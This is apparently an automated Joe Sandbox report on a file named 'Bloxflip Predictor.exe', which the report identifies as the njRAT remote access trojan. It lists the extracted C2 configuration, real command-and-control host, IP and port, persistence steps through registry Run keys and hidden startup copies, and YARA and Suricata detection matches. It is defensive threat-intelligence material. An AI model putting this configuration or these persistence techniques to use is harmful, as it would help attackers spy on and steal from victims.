Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Bloxflip Predictor.exe

Overview

General Information

Sample name:Bloxflip Predictor.exe
Analysis ID:1574576
MD5:7bf897ca59b77ad3069c07149c35f97e
SHA1:6951dc20fa1e550ec9d066fe20e5100a9946a56b
SHA256:bc37b896fee26a5b4de7845cdd046e0200c783d4907ffa7e16da84ed6b5987dd
Tags:exeNjRATuser-lontze7
Infos:

Detection

Njrat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Njrat
.NET source code contains potential unpacker
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Disables zone checking for all users
Drops PE files to the startup folder
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses cmd line tools excessively to alter registry or file data
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

  • System is w10x64
  • Bloxflip Predictor.exe (PID: 5504 cmdline: "C:\Users\user\Desktop\Bloxflip Predictor.exe" MD5: 7BF897CA59B77AD3069C07149C35F97E)
    • Bloxflip Predictor.exe (PID: 428 cmdline: "C:\Windows\Bloxflip Predictor.exe" MD5: 7BF897CA59B77AD3069C07149C35F97E)
      • attrib.exe (PID: 2876 cmdline: attrib +h +r +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
        • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • attrib.exe (PID: 1476 cmdline: attrib +h +r +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
        • conhost.exe (PID: 4796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5336 cmdline: attrib +h +r +s "C:\Windows\Bloxflip Predictor.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 2608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Bloxflip Predictor.exe (PID: 7056 cmdline: "C:\Windows\Bloxflip Predictor.exe" MD5: 7BF897CA59B77AD3069C07149C35F97E)
  • Windows.exe (PID: 6364 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe" MD5: 7BF897CA59B77AD3069C07149C35F97E)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
NjRATRedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat
{"Host": "quite-cs.at.ply.gg", "Port": "10397", "Registry Value": "Windows", "Auto Run": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Campaign ID": "HaCkEd", "Network Seprator": "|-F-|", "Install Dir": "WinDir", "Install Name": "Bloxflip Predictor.exe", "Version": "v2.0"}
SourceRuleDescriptionAuthorStrings
Bloxflip Predictor.exeJoeSecurity_NjratYara detected NjratJoe Security
    Bloxflip Predictor.exeWindows_Trojan_Njrat_30f3c220unknownunknown
    • 0x4c2e:$a1: get_Registry
    • 0x5b6d:$a2: SEE_MASK_NOZONECHECKS
    • 0x5d48:$a4: cmd.exe /c ping 0 -n 2 & del "
    • 0x5ce8:$a5: netsh firewall delete allowedprogram "
    • 0x5c66:$a6: [+] System :
    Bloxflip Predictor.exeCN_disclosed_20180208_cDetects malware from disclosed CN malware setFlorian Roth
    • 0x5d48:$x1: cmd.exe /c ping 0 -n 2 & del "
    • 0x5987:$s3: Executed As
    • 0x4305:$s5: Stub.exe
    Bloxflip Predictor.exeNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
    • 0x5b6d:$reg: SEE_MASK_NOZONECHECKS
    • 0x595f:$msg: Execute ERROR
    • 0x59a1:$msg: Execute ERROR
    • 0x5d48:$ping: cmd.exe /c ping 0 -n 2 & del
    Bloxflip Predictor.exeINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
    • 0x5602:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
    Click to see the 2 entries
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeJoeSecurity_NjratYara detected NjratJoe Security
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeWindows_Trojan_Njrat_30f3c220unknownunknown
      • 0x4c2e:$a1: get_Registry
      • 0x5b6d:$a2: SEE_MASK_NOZONECHECKS
      • 0x5d48:$a4: cmd.exe /c ping 0 -n 2 & del "
      • 0x5ce8:$a5: netsh firewall delete allowedprogram "
      • 0x5c66:$a6: [+] System :
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeCN_disclosed_20180208_cDetects malware from disclosed CN malware setFlorian Roth
      • 0x5d48:$x1: cmd.exe /c ping 0 -n 2 & del "
      • 0x5987:$s3: Executed As
      • 0x4305:$s5: Stub.exe
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
      • 0x5b6d:$reg: SEE_MASK_NOZONECHECKS
      • 0x595f:$msg: Execute ERROR
      • 0x59a1:$msg: Execute ERROR
      • 0x5d48:$ping: cmd.exe /c ping 0 -n 2 & del
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
      • 0x5602:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
      Click to see the 9 entries
      SourceRuleDescriptionAuthorStrings
      0000000C.00000002.2880439130.00000000034A1000.00000004.00000800.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
      • 0x1f54:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
      00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_NjratYara detected NjratJoe Security
        00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_Njrat_30f3c220unknownunknown
        • 0x4a2e:$a1: get_Registry
        • 0x596d:$a2: SEE_MASK_NOZONECHECKS
        • 0x5b48:$a4: cmd.exe /c ping 0 -n 2 & del "
        • 0x5ae8:$a5: netsh firewall delete allowedprogram "
        • 0x5a66:$a6: [+] System :
        00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmpNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
        • 0x596d:$reg: SEE_MASK_NOZONECHECKS
        • 0x575f:$msg: Execute ERROR
        • 0x57a1:$msg: Execute ERROR
        • 0x5b48:$ping: cmd.exe /c ping 0 -n 2 & del
        00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmpINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
        • 0x5402:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
        Click to see the 10 entries
        SourceRuleDescriptionAuthorStrings
        1.0.Bloxflip Predictor.exe.510000.0.unpackJoeSecurity_NjratYara detected NjratJoe Security
          1.0.Bloxflip Predictor.exe.510000.0.unpackWindows_Trojan_Njrat_30f3c220unknownunknown
          • 0x4c2e:$a1: get_Registry
          • 0x5b6d:$a2: SEE_MASK_NOZONECHECKS
          • 0x5d48:$a4: cmd.exe /c ping 0 -n 2 & del "
          • 0x5ce8:$a5: netsh firewall delete allowedprogram "
          • 0x5c66:$a6: [+] System :
          1.0.Bloxflip Predictor.exe.510000.0.unpackCN_disclosed_20180208_cDetects malware from disclosed CN malware setFlorian Roth
          • 0x5d48:$x1: cmd.exe /c ping 0 -n 2 & del "
          • 0x5987:$s3: Executed As
          • 0x4305:$s5: Stub.exe
          1.0.Bloxflip Predictor.exe.510000.0.unpackNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
          • 0x5b6d:$reg: SEE_MASK_NOZONECHECKS
          • 0x595f:$msg: Execute ERROR
          • 0x59a1:$msg: Execute ERROR
          • 0x5d48:$ping: cmd.exe /c ping 0 -n 2 & del
          1.0.Bloxflip Predictor.exe.510000.0.unpackINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
          • 0x5602:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
          Click to see the 16 entries

          System Summary

          barindex
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\Bloxflip Predictor.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Bloxflip Predictor.exe, ProcessId: 5504, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows2
          Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Bloxflip Predictor.exe, ProcessId: 5504, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.URL, EventID: 13, EventType: SetValue, Image: C:\Windows\Bloxflip Predictor.exe, ProcessId: 428, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows2
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-13T12:31:56.140063+010020211761Malware Command and Control Activity Detected192.168.2.549726147.185.221.22410397TCP
          2024-12-13T12:32:20.152010+010020211761Malware Command and Control Activity Detected192.168.2.549777147.185.221.22410397TCP
          2024-12-13T12:32:44.355246+010020211761Malware Command and Control Activity Detected192.168.2.549830147.185.221.22410397TCP
          2024-12-13T12:33:08.403871+010020211761Malware Command and Control Activity Detected192.168.2.549887147.185.221.22410397TCP
          2024-12-13T12:33:32.449667+010020211761Malware Command and Control Activity Detected192.168.2.549941147.185.221.22410397TCP
          2024-12-13T12:33:56.481063+010020211761Malware Command and Control Activity Detected192.168.2.549981147.185.221.22410397TCP
          2024-12-13T12:34:20.522843+010020211761Malware Command and Control Activity Detected192.168.2.549982147.185.221.22410397TCP
          2024-12-13T12:34:44.546142+010020211761Malware Command and Control Activity Detected192.168.2.549983147.185.221.22410397TCP
          2024-12-13T12:35:08.575600+010020211761Malware Command and Control Activity Detected192.168.2.549984147.185.221.22410397TCP
          2024-12-13T12:35:32.630743+010020211761Malware Command and Control Activity Detected192.168.2.549985147.185.221.22410397TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-13T12:31:56.140063+010020331321Malware Command and Control Activity Detected192.168.2.549726147.185.221.22410397TCP
          2024-12-13T12:32:20.152010+010020331321Malware Command and Control Activity Detected192.168.2.549777147.185.221.22410397TCP
          2024-12-13T12:32:44.355246+010020331321Malware Command and Control Activity Detected192.168.2.549830147.185.221.22410397TCP
          2024-12-13T12:33:08.403871+010020331321Malware Command and Control Activity Detected192.168.2.549887147.185.221.22410397TCP
          2024-12-13T12:33:32.449667+010020331321Malware Command and Control Activity Detected192.168.2.549941147.185.221.22410397TCP
          2024-12-13T12:33:56.481063+010020331321Malware Command and Control Activity Detected192.168.2.549981147.185.221.22410397TCP
          2024-12-13T12:34:20.522843+010020331321Malware Command and Control Activity Detected192.168.2.549982147.185.221.22410397TCP
          2024-12-13T12:34:44.546142+010020331321Malware Command and Control Activity Detected192.168.2.549983147.185.221.22410397TCP
          2024-12-13T12:35:08.575600+010020331321Malware Command and Control Activity Detected192.168.2.549984147.185.221.22410397TCP
          2024-12-13T12:35:32.630743+010020331321Malware Command and Control Activity Detected192.168.2.549985147.185.221.22410397TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-13T12:32:02.247114+010028255641Malware Command and Control Activity Detected192.168.2.549726147.185.221.22410397TCP
          2024-12-13T12:32:26.450354+010028255641Malware Command and Control Activity Detected192.168.2.549777147.185.221.22410397TCP
          2024-12-13T12:32:37.200493+010028255641Malware Command and Control Activity Detected192.168.2.549777147.185.221.22410397TCP
          2024-12-13T12:32:40.763598+010028255641Malware Command and Control Activity Detected192.168.2.549777147.185.221.22410397TCP
          2024-12-13T12:32:45.653488+010028255641Malware Command and Control Activity Detected192.168.2.549830147.185.221.22410397TCP
          2024-12-13T12:32:50.932266+010028255641Malware Command and Control Activity Detected192.168.2.549830147.185.221.22410397TCP
          2024-12-13T12:32:51.418885+010028255641Malware Command and Control Activity Detected192.168.2.549830147.185.221.22410397TCP
          2024-12-13T12:32:52.965912+010028255641Malware Command and Control Activity Detected192.168.2.549830147.185.221.22410397TCP
          2024-12-13T12:32:53.091103+010028255641Malware Command and Control Activity Detected192.168.2.549830147.185.221.22410397TCP
          2024-12-13T12:32:54.168890+010028255641Malware Command and Control Activity Detected192.168.2.549830147.185.221.22410397TCP
          2024-12-13T12:32:54.288700+010028255641Malware Command and Control Activity Detected192.168.2.549830147.185.221.22410397TCP
          2024-12-13T12:32:55.988155+010028255641Malware Command and Control Activity Detected192.168.2.549830147.185.221.22410397TCP
          2024-12-13T12:32:56.110068+010028255641Malware Command and Control Activity Detected192.168.2.549830147.185.221.22410397TCP
          2024-12-13T12:32:56.235673+010028255641Malware Command and Control Activity Detected192.168.2.549830147.185.221.22410397TCP
          2024-12-13T12:32:56.355511+010028255641Malware Command and Control Activity Detected192.168.2.549830147.185.221.22410397TCP
          2024-12-13T12:33:03.308156+010028255641Malware Command and Control Activity Detected192.168.2.549830147.185.221.22410397TCP
          2024-12-13T12:33:16.217269+010028255641Malware Command and Control Activity Detected192.168.2.549887147.185.221.22410397TCP
          2024-12-13T12:33:16.338822+010028255641Malware Command and Control Activity Detected192.168.2.549887147.185.221.22410397TCP
          2024-12-13T12:33:16.578859+010028255641Malware Command and Control Activity Detected192.168.2.549887147.185.221.22410397TCP
          2024-12-13T12:33:19.122933+010028255641Malware Command and Control Activity Detected192.168.2.549887147.185.221.22410397TCP
          2024-12-13T12:33:21.608423+010028255641Malware Command and Control Activity Detected192.168.2.549887147.185.221.22410397TCP
          2024-12-13T12:33:24.330608+010028255641Malware Command and Control Activity Detected192.168.2.549887147.185.221.22410397TCP
          2024-12-13T12:33:24.577585+010028255641Malware Command and Control Activity Detected192.168.2.549887147.185.221.22410397TCP
          2024-12-13T12:33:27.309473+010028255641Malware Command and Control Activity Detected192.168.2.549887147.185.221.22410397TCP
          2024-12-13T12:33:30.017959+010028255641Malware Command and Control Activity Detected192.168.2.549887147.185.221.22410397TCP
          2024-12-13T12:33:30.272172+010028255641Malware Command and Control Activity Detected192.168.2.549887147.185.221.22410397TCP
          2024-12-13T12:33:33.238258+010028255641Malware Command and Control Activity Detected192.168.2.549941147.185.221.22410397TCP
          2024-12-13T12:33:41.737850+010028255641Malware Command and Control Activity Detected192.168.2.549941147.185.221.22410397TCP
          2024-12-13T12:33:41.989544+010028255641Malware Command and Control Activity Detected192.168.2.549941147.185.221.22410397TCP
          2024-12-13T12:33:44.583171+010028255641Malware Command and Control Activity Detected192.168.2.549941147.185.221.22410397TCP
          2024-12-13T12:33:51.645412+010028255641Malware Command and Control Activity Detected192.168.2.549941147.185.221.22410397TCP
          2024-12-13T12:33:56.841092+010028255641Malware Command and Control Activity Detected192.168.2.549981147.185.221.22410397TCP
          2024-12-13T12:33:59.273170+010028255641Malware Command and Control Activity Detected192.168.2.549981147.185.221.22410397TCP
          2024-12-13T12:34:01.452339+010028255641Malware Command and Control Activity Detected192.168.2.549981147.185.221.22410397TCP
          2024-12-13T12:34:01.812833+010028255641Malware Command and Control Activity Detected192.168.2.549981147.185.221.22410397TCP
          2024-12-13T12:34:01.983927+010028255641Malware Command and Control Activity Detected192.168.2.549981147.185.221.22410397TCP
          2024-12-13T12:34:08.965686+010028255641Malware Command and Control Activity Detected192.168.2.549981147.185.221.22410397TCP
          2024-12-13T12:34:22.304772+010028255641Malware Command and Control Activity Detected192.168.2.549982147.185.221.22410397TCP
          2024-12-13T12:34:29.053118+010028255641Malware Command and Control Activity Detected192.168.2.549982147.185.221.22410397TCP
          2024-12-13T12:34:29.173141+010028255641Malware Command and Control Activity Detected192.168.2.549982147.185.221.22410397TCP
          2024-12-13T12:34:36.705475+010028255641Malware Command and Control Activity Detected192.168.2.549982147.185.221.22410397TCP
          2024-12-13T12:34:39.761643+010028255641Malware Command and Control Activity Detected192.168.2.549982147.185.221.22410397TCP
          2024-12-13T12:34:45.305350+010028255641Malware Command and Control Activity Detected192.168.2.549983147.185.221.22410397TCP
          2024-12-13T12:34:48.003814+010028255641Malware Command and Control Activity Detected192.168.2.549983147.185.221.22410397TCP
          2024-12-13T12:34:48.223165+010028255641Malware Command and Control Activity Detected192.168.2.549983147.185.221.22410397TCP
          2024-12-13T12:34:48.366920+010028255641Malware Command and Control Activity Detected192.168.2.549983147.185.221.22410397TCP
          2024-12-13T12:34:50.543528+010028255641Malware Command and Control Activity Detected192.168.2.549983147.185.221.22410397TCP
          2024-12-13T12:34:51.281406+010028255641Malware Command and Control Activity Detected192.168.2.549983147.185.221.22410397TCP
          2024-12-13T12:34:53.695251+010028255641Malware Command and Control Activity Detected192.168.2.549983147.185.221.22410397TCP
          2024-12-13T12:34:53.815105+010028255641Malware Command and Control Activity Detected192.168.2.549983147.185.221.22410397TCP
          2024-12-13T12:34:56.918087+010028255641Malware Command and Control Activity Detected192.168.2.549983147.185.221.22410397TCP
          2024-12-13T12:35:01.999078+010028255641Malware Command and Control Activity Detected192.168.2.549983147.185.221.22410397TCP
          2024-12-13T12:35:04.566292+010028255641Malware Command and Control Activity Detected192.168.2.549983147.185.221.22410397TCP
          2024-12-13T12:35:04.813558+010028255641Malware Command and Control Activity Detected192.168.2.549983147.185.221.22410397TCP
          2024-12-13T12:35:28.630154+010028255641Malware Command and Control Activity Detected192.168.2.549984147.185.221.22410397TCP
          2024-12-13T12:35:33.608286+010028255641Malware Command and Control Activity Detected192.168.2.549985147.185.221.22410397TCP
          2024-12-13T12:35:33.728289+010028255641Malware Command and Control Activity Detected192.168.2.549985147.185.221.22410397TCP
          2024-12-13T12:35:34.081838+010028255641Malware Command and Control Activity Detected192.168.2.549985147.185.221.22410397TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-13T12:31:56.262752+010028255631Malware Command and Control Activity Detected192.168.2.549726147.185.221.22410397TCP
          2024-12-13T12:32:20.271819+010028255631Malware Command and Control Activity Detected192.168.2.549777147.185.221.22410397TCP
          2024-12-13T12:32:44.474994+010028255631Malware Command and Control Activity Detected192.168.2.549830147.185.221.22410397TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-13T12:31:56.262752+010028384861Malware Command and Control Activity Detected192.168.2.549726147.185.221.22410397TCP
          2024-12-13T12:32:20.271819+010028384861Malware Command and Control Activity Detected192.168.2.549777147.185.221.22410397TCP
          2024-12-13T12:32:44.474994+010028384861Malware Command and Control Activity Detected192.168.2.549830147.185.221.22410397TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: Bloxflip Predictor.exeAvira: detected
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeAvira: detection malicious, Label: TR/Dropper.Gen7
          Source: C:\Windows\Bloxflip Predictor.exeAvira: detection malicious, Label: TR/Dropper.Gen7
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpackMalware Configuration Extractor: Njrat {"Host": "quite-cs.at.ply.gg", "Port": "10397", "Registry Value": "Windows", "Auto Run": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Campaign ID": "HaCkEd", "Network Seprator": "|-F-|", "Install Dir": "WinDir", "Install Name": "Bloxflip Predictor.exe", "Version": "v2.0"}
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeReversingLabs: Detection: 84%
          Source: C:\Windows\Bloxflip Predictor.exeReversingLabs: Detection: 84%
          Source: Bloxflip Predictor.exeReversingLabs: Detection: 84%
          Source: Yara matchFile source: Bloxflip Predictor.exe, type: SAMPLE
          Source: Yara matchFile source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Bloxflip Predictor.exe PID: 5504, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPED
          Source: Yara matchFile source: C:\Windows\Bloxflip Predictor.exe, type: DROPPED
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeJoe Sandbox ML: detected
          Source: C:\Windows\Bloxflip Predictor.exeJoe Sandbox ML: detected
          Source: Bloxflip Predictor.exeJoe Sandbox ML: detected
          Source: Bloxflip Predictor.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.5:49714 version: TLS 1.0
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
          Source: Bloxflip Predictor.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile opened: C:\Users\user\AppDataJump to behavior

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:49726 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.5:49726 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2825563 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (inf) : 192.168.2.5:49726 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2838486 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi Variant CnC Activity (inf) : 192.168.2.5:49726 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:49726 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:49777 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.5:49777 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2825563 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (inf) : 192.168.2.5:49777 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2838486 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi Variant CnC Activity (inf) : 192.168.2.5:49777 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:49777 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:49830 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.5:49830 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2825563 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (inf) : 192.168.2.5:49830 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2838486 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi Variant CnC Activity (inf) : 192.168.2.5:49830 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:49830 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:49887 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.5:49887 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:49887 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:49941 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.5:49941 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:49941 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:49981 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.5:49981 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:49981 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:49982 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.5:49982 -> 147.185.221.224:10397
